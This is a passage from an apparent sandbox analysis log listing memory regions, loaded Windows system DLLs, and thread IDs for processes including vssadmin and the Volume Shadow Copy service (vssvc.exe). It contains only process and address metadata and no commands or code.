"private_0x000000007efdf000" filename = "" Region: id = 1220 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1221 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1222 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1223 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 1224 start_va = 0x74bd0000 end_va = 0x74bd7fff entry_point = 0x74bd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1225 start_va = 0x74be0000 end_va = 0x74c3bfff entry_point = 0x74c1f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1226 start_va = 0x74c40000 end_va = 0x74c7efff entry_point = 0x74c6de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1227 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1228 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1229 start_va = 0x130000 end_va = 0x196fff entry_point = 0x130000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1230 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 1231 start_va = 0x6c0000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 1232 start_va = 0x73b70000 end_va = 0x73c85fff entry_point = 0x73b70000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll") Region: id = 1233 start_va = 0x73f80000 end_va = 0x73f93fff entry_point = 0x73f80000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll") Region: id = 1234 start_va = 0x74c80000 end_va = 0x74c8ffff entry_point = 0x74c80000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll") Region: id = 1235 start_va = 0x751f0000 end_va = 0x751fbfff entry_point = 0x751f10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1236 start_va = 0x75200000 end_va = 0x7525ffff entry_point = 0x7521a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1237 start_va = 0x75260000 end_va = 0x753bbfff entry_point = 0x752aba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1238 start_va = 0x75660000 end_va = 0x7574ffff entry_point = 0x75670569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1239 start_va = 0x75750000 end_va = 0x757defff entry_point = 0x75753fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1240 start_va = 0x76430000 end_va = 0x7652ffff entry_point = 0x7644b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1241 start_va = 0x76a20000 end_va = 0x76b2ffff entry_point = 0x76a332d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1242 start_va = 0x76c90000 end_va = 0x76cd5fff entry_point = 0x76c97478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1243 start_va = 0x76ce0000 end_va = 0x76d8bfff entry_point = 0x76cea472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1244 start_va = 0x76e20000 end_va = 0x76eaffff entry_point = 0x76e36343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1245 start_va = 0x76f00000 end_va = 0x76f9cfff entry_point = 0x76f33fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1246 start_va = 0x76fa0000 end_va = 0x76fb8fff entry_point = 0x76fa4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1247 start_va = 0x77200000 end_va = 0x7729ffff entry_point = 0x772149e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1248 start_va = 0x772a0000 end_va = 0x773befff entry_point = 0x0 region_type = private name = "private_0x00000000772a0000" filename = "" Region: id = 1249 start_va = 0x773c0000 end_va = 0x774b9fff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 1250 start_va = 0x77670000 end_va = 0x77679fff entry_point = 0x776736a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1251 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1252 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1253 start_va = 0x4e0000 end_va = 0x667fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 1254 start_va = 0x767d0000 end_va = 0x7689bfff entry_point = 0x767d168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1255 start_va = 0x768a0000 end_va = 0x768fffff entry_point = 0x768b158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1256 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1257 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1258 start_va = 0x80000 end_va = 0x8cfff entry_point = 0x80000 region_type = mapped_file name = "vssadmin.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui") Region: id = 1259 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1260 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1261 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1262 start_va = 0x260000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1263 start_va = 0x6d0000 end_va = 0x850fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 1264 start_va = 0x860000 end_va = 0x1c5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 1265 start_va = 0x1d20000 end_va = 0x1d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 1266 start_va = 0x76900000 end_va = 0x76982fff entry_point = 0x769023d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1267 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1268 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1269 start_va = 0x1ce0000 end_va = 0x1d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 1270 start_va = 0x1db0000 end_va = 0x1deffff entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 1271 start_va = 0x74de0000 end_va = 0x74e1afff entry_point = 0x74de128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1272 start_va = 0x74e20000 end_va = 0x74e35fff entry_point = 0x74e22dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1273 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1274 start_va = 0x1df0000 end_va = 0x20befff entry_point = 0x1df0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1275 start_va = 0x75000000 end_va = 0x7500dfff entry_point = 0x75001235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Thread: id = 50 os_tid = 0xb9c Thread: id = 51 os_tid = 0xbac Thread: id = 52 os_tid = 0xbb0 Thread: id = 53 os_tid = 0xbb4 Thread: id = 54 os_tid = 0xbb8 Process: id = "20" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x62c8d000" os_pid = "0xbbc" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "19" os_parent_pid = "0xb98" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0004c6a8" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1276 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1277 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1278 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1279 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1280 start_va = 0x50000 end_va = 0x51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1281 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1282 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1283 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1284 start_va = 0x1f0000 end_va = 0x256fff entry_point = 0x1f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1285 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1286 start_va = 0x360000 end_va = 0x370fff entry_point = 0x360000 region_type = mapped_file name = "vssvc.exe.mui" filename = "\\Windows\\System32\\en-US\\VSSVC.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\vssvc.exe.mui") Region: id = 1287 start_va = 0x380000 end_va = 0x380fff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 1288 start_va = 0x390000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 1289 start_va = 0x410000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1290 start_va = 0x420000 end_va = 0x5a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1291 start_va = 0x5b0000 end_va = 0x730fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 1292 start_va = 0x740000 end_va = 0x7fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 1293 start_va = 0x800000 end_va = 0xbf2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 1294 start_va = 0xc10000 end_va = 0xc8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 1295 start_va = 0xcd0000 end_va = 0xd4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 1296 start_va = 0xe20000 end_va = 0xe9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 1297 start_va = 0xee0000 end_va = 0xf5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 1298 start_va = 0xf60000 end_va = 0x122efff entry_point = 0xf60000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1299 start_va = 0x12c0000 end_va = 0x133ffff entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 1300 start_va = 0x13a0000 end_va = 0x141ffff entry_point = 0x0 region_type = private name = "private_0x00000000013a0000" filename = "" Region: id = 1301 start_va = 0x772a0000 end_va = 0x773befff entry_point = 0x772a0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1302 start_va = 0x773c0000 end_va = 0x774b9fff entry_point = 0x773c0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1303 start_va = 0x774c0000 end_va = 0x77668fff entry_point = 0x774c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1304 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1305 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1306 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1307 start_va = 0xff6d0000 end_va = 0xff85afff entry_point = 0xff6d0000 region_type = mapped_file name = "vssvc.exe" filename = "\\Windows\\System32\\VSSVC.exe" (normalized: "c:\\windows\\system32\\vssvc.exe") Region: id = 1308 start_va = 0x7fef4270000 end_va = 0x7fef4283fff entry_point = 0x7fef4270000 region_type = mapped_file name = "vss_ps.dll" filename = "\\Windows\\System32\\vss_ps.dll" (normalized: "c:\\windows\\system32\\vss_ps.dll") Region: id = 1309 start_va = 0x7fef5be0000 end_va = 0x7fef5bf3fff entry_point = 0x7fef5be0000 region_type = mapped_file name = "xolehlp.dll" filename = "\\Windows\\System32\\xolehlp.dll" (normalized: "c:\\windows\\system32\\xolehlp.dll") Region: id = 1310 start_va = 0x7fef7bc0000 end_va = 0x7fef7bc9fff entry_point = 0x7fef7bc0000 region_type = mapped_file name = "virtdisk.dll" filename = "\\Windows\\System32\\virtdisk.dll" (normalized: "c:\\windows\\system32\\virtdisk.dll") Region: id = 1311 start_va = 0x7fef7c20000 end_va = 0x7fef7c28fff entry_point = 0x7fef7c20000 region_type = mapped_file name = "fltlib.dll" filename = "\\Windows\\System32\\fltLib.dll" (normalized: "c:\\windows\\system32\\fltlib.dll") Region: id = 1312 start_va = 0x7fef81c0000 end_va = 0x7fef81d8fff entry_point = 0x7fef81c0000 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 1313 start_va = 0x7fef81e0000 end_va = 0x7fef822ffff entry_point = 0x7fef81e0000 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 1314 start_va = 0x7fefa510000 end_va = 0x7fefa526fff entry_point = 0x7fefa510000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1315 start_va = 0x7fefa530000 end_va = 0x7fefa6dffff entry_point = 0x7fefa530000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1316 start_va = 0x7fefb130000 end_va = 0x7fefb148fff entry_point = 0x7fefb130000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1317 start_va = 0x7fefb5e0000 end_va = 0x7fefb5f3fff entry_point = 0x7fefb5e0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1318 start_va = 0x7fefb600000 end_va = 0x7fefb614fff entry_point = 0x7fefb600000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1319 start_va = 0x7fefb620000 end_va = 0x7fefb62bfff entry_point = 0x7fefb620000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1320 start_va = 0x7fefb630000 end_va = 0x7fefb645fff entry_point = 0x7fefb630000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1321 start_va = 0x7fefc5d0000 end_va = 0x7fefc5dbfff entry_point = 0x7fefc5d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1322 start_va = 0x7fefca00000 end_va = 0x7fefca46fff entry_point = 0x7fefca00000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1323 start_va = 0x7fefcd00000 end_va = 0x7fefcd16fff entry_point = 0x7fefcd00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1324 start_va = 0x7fefcef0000 end_va = 0x7fefcf1efff entry_point = 0x7fefcef0000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1325 start_va = 0x7fefcfa0000 end_va = 0x7fefcfb3fff entry_point = 0x7fefcfa0000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 1326 start_va = 0x7fefd200000 end_va = 0x7fefd222fff entry_point = 0x7fefd200000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1327 start_va = 0x7fefd300000 end_va = 0x7fefd30efff entry_point = 0x7fefd300000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1328 start_va = 0x7fefd3f0000 end_va = 0x7fefd403fff entry_point = 0x7fefd3f0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1329 start_va = 0x7fefd560000 end_va = 0x7fefd579fff entry_point = 0x7fefd560000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1330 start_va = 0x7fefd580000 end_va = 0x7fefd5eafff entry_point = 0x7fefd580000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1331 start_va = 0x7fefd630000 end_va = 0x7fefd665fff entry_point = 0x7fefd630000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1332 start_va = 0x7fefd7e0000 end_va = 0x7fefd87efff entry_point = 0x7fefd7e0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1333 start_va = 0x7fefd9b0000 end_va = 0x7fefdb86fff entry_point = 0x7fefd9b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1334 start_va = 0x7fefdb90000 end_va = 0x7fefdc98fff entry_point = 0x7fefdb90000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1335 start_va = 0x7fefdca0000 end_va = 0x7fefdcadfff entry_point = 0x7fefdca0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1336 start_va = 0x7fefe020000 end_va = 0x7fefe0f6fff entry_point = 0x7fefe020000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1337 start_va = 0x7fefe100000 end_va = 0x7fefe11efff entry_point = 0x7fefe100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1338 start_va = 0x7fefeeb0000 end_va = 0x7fefef48fff entry_point = 0x7fefeeb0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1339 start_va = 0x7fefef50000 end_va = 0x7feff07cfff entry_point = 0x7fefef50000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1340 start_va = 0x7feff2e0000 end_va = 0x7feff346fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1341 start_va = 0x7feff350000 end_va = 0x7feff418fff entry_point = 0x7feff350000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1342 start_va = 0x7feff420000 end_va = 0x7feff622fff entry_point = 0x7feff420000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1343 start_va = 0x7feff630000 end_va = 0x7feff70afff entry_point = 0x7feff630000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1344 start_va = 0x7feff710000 end_va = 0x7feff780fff entry_point = 0x7feff710000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1345 start_va = 0x7feff7a0000 end_va = 0x7feff7cdfff entry_point = 0x7feff7a0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1346 start_va = 0x7feff7e0000 end_va = 0x7feff7e0fff entry_point = 0x7feff7e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1347 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1348 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1349 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1350 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 1351 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1352 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1353 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1354 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1355 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1356 start_va = 0x7fefbec0000 end_va = 0x7fefbedcfff entry_point = 0x7fefbec0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1357 start_va = 0x3a0000 end_va = 0x3a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1358 start_va = 0x7fefb090000 end_va = 0x7fefb0f6fff entry_point = 0x7fefb090000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1498 start_va = 0x1500000 end_va = 0x157ffff entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 1499 start_va = 0x7fefbd90000 end_va = 0x7fefbebbfff entry_point = 0x7fefbd90000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1500 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 1501 start_va = 0x7fef41e0000 end_va = 0x7fef4264fff entry_point = 0x7fef41e0000 region_type = mapped_file name = "catsrvut.dll" filename = "\\Windows\\System32\\catsrvut.dll" (normalized: "c:\\windows\\system32\\catsrvut.dll") Region: id = 1502 start_va = 0x7fef7bb0000 end_va = 0x7fef7bbbfff entry_point = 0x7fef7bb0000 region_type = mapped_file name = "mfcsubs.dll" filename = "\\Windows\\System32\\mfcsubs.dll" (normalized: "c:\\windows\\system32\\mfcsubs.dll") Thread: id = 55 os_tid = 0xbd0 Thread: id = 56 os_tid = 0xbcc Thread: id = 57 os_tid = 0xbc8 Thread: id = 58 os_tid = 0xbc4 Thread: id = 59 os_tid = 0xbc0 Thread: id = 60 os_tid = 0xbd4 Thread: id = 61 os_tid = 0xbd8 Thread: id = 62 os_tid = 0xbdc Thread: id = 81 os_tid = 